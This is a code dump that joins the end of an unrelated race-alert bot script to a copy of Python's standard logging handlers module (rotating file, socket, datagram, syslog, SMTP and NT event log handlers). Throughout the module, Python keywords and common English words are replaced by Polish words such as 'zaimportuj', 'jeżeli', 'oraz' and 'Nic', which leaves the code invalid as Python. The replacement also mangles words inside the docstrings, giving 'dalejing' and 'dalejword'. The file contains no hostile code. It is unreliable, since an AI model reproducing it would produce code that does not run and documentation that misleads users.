races.sort(key=lambda r: r['datetime'])
bot.update_events(races)
bot.schedule_alerts(MOTOR_CHANNEL)
sleep(60 * 60 * 24)
# start all threads, give add_races a chance before other threads start
Thread(target=add_races, daemon=True, args=(bot,)).start()
sleep(10)
bot.listen()
|
handlers.py | # Copyright 2001-2015 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, oraz distribute this software oraz its
# documentation dla any purpose oraz without fee jest hereby granted,
# provided that the above copyright notice appear w all copies oraz that
# both that copyright notice oraz this permission notice appear w
# supporting documentation, oraz that the name of Vinay Sajip
# nie be used w advertising albo publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers dla the logging package dla Python. The core package jest
based on PEP 282 oraz comments thereto w comp.lang.python.
Copyright (C) 2001-2015 Vinay Sajip. All Rights Reserved.
To use, simply 'zaimportuj logging.handlers' oraz log away!
"""
zaimportuj logging, socket, os, pickle, struct, time, re
z stat zaimportuj ST_DEV, ST_INO, ST_MTIME
zaimportuj queue
spróbuj:
zaimportuj threading
wyjąwszy ImportError: #pragma: no cover
threading = Nic
#
# Some constants...
#
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60 # number of seconds w a day
klasa BaseRotatingHandler(logging.FileHandler):
"""
Base klasa dla handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
albo TimedRotatingFileHandler.
"""
def __init__(self, filename, mode, encoding=Nic, delay=Nieprawda):
"""
Use the specified filename dla streamed logging
"""
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.mode = mode
self.encoding = encoding
self.namer = Nic
self.rotator = Nic
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering dla rollover jako described
w doRollover().
"""
spróbuj:
jeżeli self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
wyjąwszy Exception:
self.handleError(record)
def rotation_filename(self, default_name):
"""
Modify the filename of a log file when rotating.
This jest provided so that a custom filename can be provided.
The default implementation calls the 'namer' attribute of the
handler, jeżeli it's callable, dalejing the default name to
it. If the attribute isn't callable (the default jest Nic), the name
jest returned unchanged.
:param default_name: The default name dla the log file.
"""
jeżeli nie callable(self.namer):
result = default_name
inaczej:
result = self.namer(default_name)
zwróć result
def rotate(self, source, dest):
"""
When rotating, rotate the current log.
The default implementation calls the 'rotator' attribute of the
handler, jeżeli it's callable, dalejing the source oraz dest arguments to
it. If the attribute isn't callable (the default jest Nic), the source
jest simply renamed to the destination.
:param source: The source filename. This jest normally the base
filename, e.g. 'test.log'
:param dest: The destination filename. This jest normally
what the source jest rotated to, e.g. 'test.log.1'.
"""
jeżeli nie callable(self.rotator):
# Issue 18940: A file may nie have been created jeżeli delay jest Prawda.
jeżeli os.path.exists(source):
os.rename(source, dest)
inaczej:
self.rotator(source, dest)
klasa RotatingFileHandler(BaseRotatingHandler):
"""
Handler dla logging to a set of files, which switches z one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0, encoding=Nic, delay=Nieprawda):
"""
Open the specified file oraz use it jako the stream dla logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes oraz backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file jest nearly maxBytes w
length. If backupCount jest >= 1, the system will successively create
new files przy the same pathname jako the base file, but przy extensions
".1", ".2" etc. appended to it. For example, przy a backupCount of 5
oraz a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to jest always "app.log" - when it gets filled up, it jest closed
oraz renamed to "app.log.1", oraz jeżeli files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes jest zero, rollover never occurs.
"""
# If rotation/rollover jest wanted, it doesn't make sense to use another
# mode. If dla example 'w' were specified, then jeżeli there were multiple
# runs of the calling application, the logs z previous runs would be
# lost jeżeli the 'w' jest respected, because the log file would be truncated
# on each run.
jeżeli maxBytes > 0:
mode = 'a'
BaseRotatingHandler.__init__(self, filename, mode, encoding, delay)
self.maxBytes = maxBytes
self.backupCount = backupCount
def doRollover(self):
"""
Do a rollover, jako described w __init__().
"""
jeżeli self.stream:
self.stream.close()
self.stream = Nic
jeżeli self.backupCount > 0:
dla i w range(self.backupCount - 1, 0, -1):
sfn = self.rotation_filename("%s.%d" % (self.baseFilename, i))
dfn = self.rotation_filename("%s.%d" % (self.baseFilename,
i + 1))
jeżeli os.path.exists(sfn):
jeżeli os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.rotation_filename(self.baseFilename + ".1")
jeżeli os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
jeżeli nie self.delay:
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine jeżeli rollover should occur.
Basically, see jeżeli the supplied record would cause the file to exceed
the size limit we have.
"""
jeżeli self.stream jest Nic: # delay was set...
self.stream = self._open()
jeżeli self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
jeżeli self.stream.tell() + len(msg) >= self.maxBytes:
zwróć 1
zwróć 0
klasa TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler dla logging to a file, rotating the log file at certain timed
intervals.
If backupCount jest > 0, when rollover jest done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0, encoding=Nic, delay=Nieprawda, utc=Nieprawda, atTime=Nic):
BaseRotatingHandler.__init__(self, filename, 'a', encoding, delay)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
self.atTime = atTime
# Calculate the real rollover interval, which jest just the number of
# seconds between rollovers. Also set the filename suffix used when
# a rollover occurs. Current 'when' events supported:
# S - Seconds
# M - Minutes
# H - Hours
# D - Days
# midnight - roll over at midnight
# W{0-6} - roll over on a certain day; 0 - Monday
#
# Case of the 'when' specifier jest nie important; lower albo upper case
# will work.
jeżeli self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}(\.\w+)?$"
albo_inaczej self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}(\.\w+)?$"
albo_inaczej self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}(\.\w+)?$"
albo_inaczej self.when == 'D' albo self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
albo_inaczej self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
jeżeli len(self.when) != 2:
podnieś ValueError("You must specify a day dla weekly rollover z 0 to 6 (0 jest Monday): %s" % self.when)
jeżeli self.when[1] < '0' albo self.when[1] > '6':
podnieś ValueError("Invalid day specified dla weekly rollover: %s" % self.when)
self.dayOfWeek = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
inaczej:
podnieś ValueError("Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval # multiply by units requested
jeżeli os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
inaczej:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
# If we are rolling over at midnight albo weekly, then the interval jest already known.
# What we need to figure out jest WHEN the next interval is. In other words,
# jeżeli you are rolling over at midnight, then your base interval jest 1 day,
# but you want to start that one day clock at midnight, nie now. So, we
# have to fudge the rolloverAt value w order to trigger the first rollover
# at the right time. After that, the regular interval will take care of
# the rest. Note that this code doesn't care about leap seconds. :)
jeżeli self.when == 'MIDNIGHT' albo self.when.startswith('W'):
# This could be done przy less code, but I wanted it to be clear
jeżeli self.utc:
t = time.gmtime(currentTime)
inaczej:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
currentDay = t[6]
# r jest the number of seconds left between now oraz the next rotation
jeżeli self.atTime jest Nic:
rotate_ts = _MIDNIGHT
inaczej:
rotate_ts = ((self.atTime.hour * 60 + self.atTime.minute)*60 +
self.atTime.second)
r = rotate_ts - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
jeżeli r < 0:
# Rotate time jest before the current time (dla example when
# self.rotateAt jest 13:45 oraz it now 14:15), rotation jest
# tomorrow.
r += _MIDNIGHT
currentDay = (currentDay + 1) % 7
result = currentTime + r
# If we are rolling over on a certain day, add w the number of days until
# the next rollover, but offset by 1 since we just calculated the time
# until the next day starts. There are three cases:
# Case 1) The day to rollover jest today; w this case, do nothing
# Case 2) The day to rollover jest further w the interval (i.e., today jest
# day 2 (Wednesday) oraz rollover jest on day 6 (Sunday). Days to
# next rollover jest simply 6 - 2 - 1, albo 3.
# Case 3) The day to rollover jest behind us w the interval (i.e., today
# jest day 5 (Saturday) oraz rollover jest on day 3 (Thursday).
# Days to rollover jest 6 - 5 + 3, albo 4. In this case, it's the
# number of days left w the current week (1) plus the number
# of days w the next week until the rollover day (3).
# The calculations described w 2) oraz 3) above need to have a day added.
# This jest because the above time calculation takes us to midnight on this
# day, i.e. the start of the next day.
jeżeli self.when.startswith('W'):
day = currentDay # 0 jest Monday
jeżeli day != self.dayOfWeek:
jeżeli day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
inaczej:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + (daysToWait * (60 * 60 * 24))
jeżeli nie self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
jeżeli dstNow != dstAtRollover:
jeżeli nie dstNow: # DST kicks w before next rollover, so we need to deduct an hour
addend = -3600
inaczej: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
result = newRolloverAt
zwróć result
def shouldRollover(self, record):
"""
Determine jeżeli rollover should occur.
record jest nie used, jako we are just comparing times, but it jest needed so
the method signatures are the same
"""
t = int(time.time())
jeżeli t >= self.rolloverAt:
zwróć 1
zwróć 0
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
prefix = baseName + "."
plen = len(prefix)
dla fileName w fileNames:
jeżeli fileName[:plen] == prefix:
suffix = fileName[plen:]
jeżeli self.extMatch.match(suffix):
result.append(os.path.join(dirName, fileName))
result.sort()
jeżeli len(result) < self.backupCount:
result = []
inaczej:
result = result[:len(result) - self.backupCount]
zwróć result
def doRollover(self):
"""
do a rollover; w this case, a date/time stamp jest appended to the filename
when the rollover happens. However, you want the file to be named dla the
start of the interval, nie the current time. If there jest a backup count,
then we have to get a list of matching filenames, sort them oraz remove
the one przy the oldest suffix.
"""
jeżeli self.stream:
self.stream.close()
self.stream = Nic
# get the time that this sequence started at oraz make it a TimeTuple
currentTime = int(time.time())
dstNow = time.localtime(currentTime)[-1]
t = self.rolloverAt - self.interval
jeżeli self.utc:
timeTuple = time.gmtime(t)
inaczej:
timeTuple = time.localtime(t)
dstThen = timeTuple[-1]
jeżeli dstNow != dstThen:
jeżeli dstNow:
addend = 3600
inaczej:
addend = -3600
timeTuple = time.localtime(t + addend)
dfn = self.rotation_filename(self.baseFilename + "." +
time.strftime(self.suffix, timeTuple))
jeżeli os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
jeżeli self.backupCount > 0:
dla s w self.getFilesToDelete():
os.remove(s)
jeżeli nie self.delay:
self.stream = self._open()
newRolloverAt = self.computeRollover(currentTime)
dopóki newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
#If DST changes oraz midnight albo weekly rollover, adjust dla this.
jeżeli (self.when == 'MIDNIGHT' albo self.when.startswith('W')) oraz nie self.utc:
dstAtRollover = time.localtime(newRolloverAt)[-1]
jeżeli dstNow != dstAtRollover:
jeżeli nie dstNow: # DST kicks w before next rollover, so we need to deduct an hour
addend = -3600
inaczej: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
self.rolloverAt = newRolloverAt
klasa WatchedFileHandler(logging.FileHandler):
"""
A handler dla logging to a file, which watches the file
to see jeżeli it has changed dopóki w use. This can happen because of
usage of programs such jako newsyslog oraz logrotate which perform
log file rotation. This handler, intended dla use under Unix,
watches the file to see jeżeli it has changed since the last emit.
(A file has changed jeżeli its device albo inode have changed.)
If it has changed, the old file stream jest closed, oraz the file
opened to get a new stream.
This handler jest nie appropriate dla use under Windows, because
under Windows open files cannot be moved albo renamed - logging
opens the files przy exclusive locks - oraz so there jest no need
dla such a handler. Furthermore, ST_INO jest nie supported under
Windows; stat always returns zero dla this value.
This handler jest based on a suggestion oraz patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=Nic, delay=Nieprawda):
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.dev, self.ino = -1, -1
self._statstream()
def _statstream(self):
jeżeli self.stream:
sres = os.fstat(self.stream.fileno())
self.dev, self.ino = sres[ST_DEV], sres[ST_INO]
def emit(self, record):
"""
Emit a record.
First check jeżeli the underlying file has changed, oraz jeżeli it
has, close the old stream oraz reopen the file to get the
current stream.
"""
# Reduce the chance of race conditions by stat'ing by path only
# once oraz then fstat'ing our new fd jeżeli we opened a new log stream.
# See issue #14632: Thanks to John Mulligan dla the problem report
# oraz patch.
spróbuj:
# stat the file by path, checking dla existence
sres = os.stat(self.baseFilename)
wyjąwszy FileNotFoundError:
sres = Nic
# compare file system stat przy that of our stream file handle
jeżeli nie sres albo sres[ST_DEV] != self.dev albo sres[ST_INO] != self.ino:
jeżeli self.stream jest nie Nic:
# we have an open file handle, clean it up
self.stream.flush()
self.stream.close()
self.stream = Nic # See Issue #21742: _open () might fail.
# open a new file handle oraz get new stat info z that fd
self.stream = self._open()
self._statstream()
logging.FileHandler.emit(self, record)
klasa SocketHandler(logging.Handler):
"""
A handler klasa which writes logging records, w pickle format, to
a streaming socket. The socket jest kept open across logging calls.
If the peer resets it, an attempt jest made to reconnect on the next call.
The pickle which jest sent jest that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does nie need to have the logging module
installed w order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler przy a specific host address oraz port.
When the attribute *closeOnError* jest set to Prawda - jeżeli a socket error
occurs, the socket jest silently closed oraz then reopened on the next
logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
jeżeli port jest Nic:
self.address = host
inaczej:
self.address = (host, port)
self.sock = Nic
self.closeOnError = Nieprawda
self.retryTime = Nic
#
# Exponential backoff parameters.
#
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
jeżeli self.port jest nie Nic:
result = socket.create_connection(self.address, timeout=timeout)
inaczej:
result = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
result.settimeout(timeout)
spróbuj:
result.connect(self.address)
wyjąwszy OSError:
result.close() # Issue 19182
podnieś
zwróć result
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson dla the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
# Either retryTime jest Nic, w which case this
# jest the first time back after a disconnect, albo
# we've waited long enough.
jeżeli self.retryTime jest Nic:
attempt = Prawda
inaczej:
attempt = (now >= self.retryTime)
jeżeli attempt:
spróbuj:
self.sock = self.makeSocket()
self.retryTime = Nic # next time, no delay before trying
wyjąwszy OSError:
#Creation failed, so set the retry time oraz return.
jeżeli self.retryTime jest Nic:
self.retryPeriod = self.retryStart
inaczej:
self.retryPeriod = self.retryPeriod * self.retryFactor
jeżeli self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows dla partial sends which can happen when the
network jest busy.
"""
jeżeli self.sock jest Nic:
self.createSocket()
#self.sock can be Nic either because we haven't reached the retry
#time yet, albo because we have reached the retry time oraz retried,
#but are still unable to connect.
jeżeli self.sock:
spróbuj:
self.sock.sendall(s)
wyjąwszy OSError: #pragma: no cover
self.sock.close()
self.sock = Nic # so we can call createSocket next time
def makePickle(self, record):
"""
Pickles the record w binary format przy a length prefix, oraz
returns it ready dla transmission across the socket.
"""
ei = record.exc_info
jeżeli ei:
# just to get traceback text into record.exc_text ...
dummy = self.format(record)
# See issue #14436: If msg albo args are objects, they may nie be
# available on the receiving end. So we convert the msg % args
# to a string, save it jako msg oraz zap the args.
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = Nic
d['exc_info'] = Nic
s = pickle.dumps(d, 1)
slen = struct.pack(">L", len(s))
zwróć slen + s
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
jeżeli self.closeOnError oraz self.sock:
self.sock.close()
self.sock = Nic #try to reconnect next time
inaczej:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record oraz writes it to the socket w binary format.
If there jest an error przy the socket, silently drop the packet.
If there was a problem przy the socket, re-establishes the
socket.
"""
spróbuj:
s = self.makePickle(record)
self.send(s)
wyjąwszy Exception:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
self.acquire()
spróbuj:
sock = self.sock
jeżeli sock:
self.sock = Nic
sock.close()
logging.Handler.close(self)
w_końcu:
self.release()
klasa DatagramHandler(SocketHandler):
"""
A handler klasa which writes logging records, w pickle format, to
a datagram socket. The pickle which jest sent jest that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does nie need to
have the logging module installed w order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler przy a specific host address oraz port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = Nieprawda
def makeSocket(self):
"""
The factory method of SocketHandler jest here overridden to create
a UDP socket (SOCK_DGRAM).
"""
jeżeli self.port jest Nic:
family = socket.AF_UNIX
inaczej:
family = socket.AF_INET
s = socket.socket(family, socket.SOCK_DGRAM)
zwróć s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows dla partial sends which can happen
when the network jest busy - UDP does nie guarantee delivery oraz
can deliver packets out of sequence.
"""
jeżeli self.sock jest Nic:
self.createSocket()
self.sock.sendto(s, self.address)
klasa SysLogHandler(logging.Handler):
"""
A handler klasa which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# z <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) oraz the top 28 bits are the
# facility (0-big number). Both the priorities oraz the facilities map
# roughly one-to-one to strings w the syslogd(8) source code. This
# mapping jest included w this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system jest unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
# other codes through 15 reserved dla system use
LOG_LOCAL0 = 16 # reserved dla local use
LOG_LOCAL1 = 17 # reserved dla local use
LOG_LOCAL2 = 18 # reserved dla local use
LOG_LOCAL3 = 19 # reserved dla local use
LOG_LOCAL4 = 20 # reserved dla local use
LOG_LOCAL5 = 21 # reserved dla local use
LOG_LOCAL6 = 22 # reserved dla local use
LOG_LOCAL7 = 23 # reserved dla local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"security": LOG_AUTH, # DEPRECATED
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - w some locales, lowercasing
#gives unexpected results. See SF #1524081: w the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=Nic):
"""
Initialize a handler.
If address jest specified jako a string, a UNIX socket jest used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility jest nie specified, LOG_USER jest used. If socktype jest
specified jako socket.SOCK_DGRAM albo socket.SOCK_STREAM, that specific
socket type will be used. For Unix sockets, you can also specify a
socktype of Nic, w which case socket.SOCK_DGRAM will be used, falling
back to socket.SOCK_STREAM.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
jeżeli isinstance(address, str):
self.unixsocket = Prawda
self._connect_unixsocket(address)
inaczej:
self.unixsocket = Nieprawda
jeżeli socktype jest Nic:
socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_INET, socktype)
jeżeli socktype == socket.SOCK_STREAM:
self.socket.connect(address)
self.socktype = socktype
self.formatter = Nic
def _connect_unixsocket(self, address):
use_socktype = self.socktype
jeżeli use_socktype jest Nic:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
spróbuj:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
wyjąwszy OSError:
self.socket.close()
jeżeli self.socktype jest nie Nic:
# user didn't specify falling back, so fail
podnieś
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
spróbuj:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
wyjąwszy OSError:
self.socket.close()
podnieś
def encodePriority(self, facility, priority):
"""
Encode the facility oraz priority. You can dalej w strings albo
integers - jeżeli strings are dalejed, the facility_names oraz
priority_names mapping dictionaries are used to convert them to
integers.
"""
jeżeli isinstance(facility, str):
facility = self.facility_names[facility]
jeżeli isinstance(priority, str):
priority = self.priority_names[priority]
zwróć (facility << 3) | priority
def close (self):
"""
Closes the socket.
"""
self.acquire()
spróbuj:
self.socket.close()
logging.Handler.close(self)
w_końcu:
self.release()
def mapPriority(self, levelName):
"""
Map a logging level name to a key w the priority_names map.
This jest useful w two scenarios: when custom levels are being
used, oraz w the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
zwróć self.priority_map.get(levelName, "warning")
ident = '' # prepended to all messages
append_nul = Prawda # some old syslog daemons expect a NUL terminator
def emit(self, record):
"""
Emit a record.
The record jest formatted, oraz then sent to the syslog server. If
exception information jest present, it jest NOT sent to the server.
"""
spróbuj:
msg = self.format(record)
jeżeli self.ident:
msg = self.ident + msg
jeżeli self.append_nul:
msg += '\000'
# We need to convert record level to lowercase, maybe this will
# change w the future.
prio = '<%d>' % self.encodePriority(self.facility,
self.mapPriority(record.levelname))
prio = prio.encode('utf-8')
# Message jest a string. Convert to bytes jako required by RFC 5424
msg = msg.encode('utf-8')
msg = prio + msg
jeżeli self.unixsocket:
spróbuj:
self.socket.send(msg)
wyjąwszy OSError:
self.socket.close()
self._connect_unixsocket(self.address)
self.socket.send(msg)
albo_inaczej self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
inaczej:
self.socket.sendall(msg)
wyjąwszy Exception:
self.handleError(record)
klasa SMTPHandler(logging.Handler):
"""
A handler klasa which sends an SMTP email dla each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject,
credentials=Nic, secure=Nic, timeout=5.0):
"""
Initialize the handler.
Initialize the instance przy the z oraz to addresses oraz subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format dla the mailhost argument. To specify
authentication credentials, supply a (username, dalejword) tuple
dla the credentials argument. To specify the use of a secure
protocol (TLS), dalej w a tuple dla the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, albo a single-value tuple przy the name
of a keyfile, albo a 2-value tuple przy the names of the keyfile oraz
certificate file. (This tuple jest dalejed to the `starttls` method).
A timeout w seconds can be specified dla the SMTP connection (the
default jest one second).
"""
logging.Handler.__init__(self)
jeżeli isinstance(mailhost, (list, tuple)):
self.mailhost, self.mailport = mailhost
inaczej:
self.mailhost, self.mailport = mailhost, Nic
jeżeli isinstance(credentials, (list, tuple)):
self.username, self.password = credentials
inaczej:
self.username = Nic
self.fromaddr = fromaddr
jeżeli isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
self.timeout = timeout
def getSubject(self, record):
"""
Determine the subject dla the email.
If you want to specify a subject line which jest record-dependent,
override this method.
"""
zwróć self.subject
def emit(self, record):
"""
Emit a record.
Format the record oraz send it to the specified addressees.
"""
spróbuj:
zaimportuj smtplib
z email.utils zaimportuj formatdate
port = self.mailport
jeżeli nie port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
msg = self.format(record)
msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\nDate: %s\r\n\r\n%s" % (
self.fromaddr,
",".join(self.toaddrs),
self.getSubject(record),
formatdate(), msg)
jeżeli self.username:
jeżeli self.secure jest nie Nic:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.sendmail(self.fromaddr, self.toaddrs, msg)
smtp.quit()
wyjąwszy Exception:
self.handleError(record)
klasa NTEventLogHandler(logging.Handler):
"""
A handler klasa which sends events to the NT Event Log. Adds a
registry entry dla the specified application name. If no dllname jest
provided, win32service.pyd (which contains some basic message
placeholders) jest used. Note that use of these placeholders will make
your event logs big, jako the entire message source jest held w the log.
If you want slimmer logs, you have to dalej w the name of your own DLL
which contains the message definitions you want to use w the event log.
"""
def __init__(self, appname, dllname=Nic, logtype="Application"):
logging.Handler.__init__(self)
spróbuj:
zaimportuj win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
jeżeli nie dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], r'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {
logging.DEBUG : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.INFO : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
logging.ERROR : win32evtlog.EVENTLOG_ERROR_TYPE,
logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
}
wyjąwszy ImportError:
print("The Python Win32 extensions dla NT (service, event "\
"logging) appear nie to be available.")
self._welu = Nic
def getMessageID(self, record):
"""
Return the message ID dla the event record. If you are using your
own messages, you could do this by having the msg dalejed to the
logger being an ID rather than a formatting string. Then, w here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which jest the base message ID w win32service.pyd.
"""
zwróć 1
def getEventCategory(self, record):
"""
